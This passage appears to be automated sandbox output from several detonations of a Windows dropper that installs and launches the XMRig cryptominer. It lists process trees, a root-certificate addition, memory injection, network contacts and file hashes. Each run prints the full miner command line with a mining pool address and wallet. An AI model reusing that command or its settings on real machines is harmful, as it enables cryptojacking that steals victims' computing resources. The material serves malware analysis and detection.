| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 376 wrote to memory of 3324 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 376 wrote to memory of 3324 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 18:01
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5024 wrote to memory of 5028 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 5024 wrote to memory of 5028 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:51
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob, hex data omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob, hex data omitted) | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4428 wrote to memory of 3956 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4428 wrote to memory of 3956 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3956-81-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-82-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-83-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-84-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4892 wrote to memory of 5044 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4892 wrote to memory of 5044 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.98.74.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/5044-16-0x0000021BC49B0000-0x0000021BC49D0000-memory.dmp
memory/5044-17-0x0000021BC4A00000-0x0000021BC4A20000-memory.dmp
memory/5044-18-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-19-0x0000021BC4A20000-0x0000021BC4A40000-memory.dmp
memory/5044-20-0x0000021BC4A40000-0x0000021BC4A60000-memory.dmp
memory/5044-21-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-22-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-25-0x0000021BC4A40000-0x0000021BC4A60000-memory.dmp
memory/5044-24-0x0000021BC4A20000-0x0000021BC4A40000-memory.dmp
memory/5044-23-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-26-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-27-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-28-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-29-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-30-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-31-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-32-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-33-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-34-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-35-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-36-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-37-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-38-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-39-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-40-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-41-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-42-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-43-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-44-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-45-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-46-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-47-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-48-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-49-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-50-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-51-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-52-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-53-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-54-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-55-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-56-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-57-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-58-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-59-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-60-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-61-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-62-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-63-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-64-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-65-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-66-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-67-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-68-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-69-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-70-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-71-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-72-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-73-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-74-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-75-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-76-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-77-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-78-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-79-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-80-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-81-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-82-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-83-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-84-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:56
Platform
win10v2004-20240508-en
Max time kernel
1799s
Max time network
1795s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3452 wrote to memory of 1000 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3452 wrote to memory of 1000 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
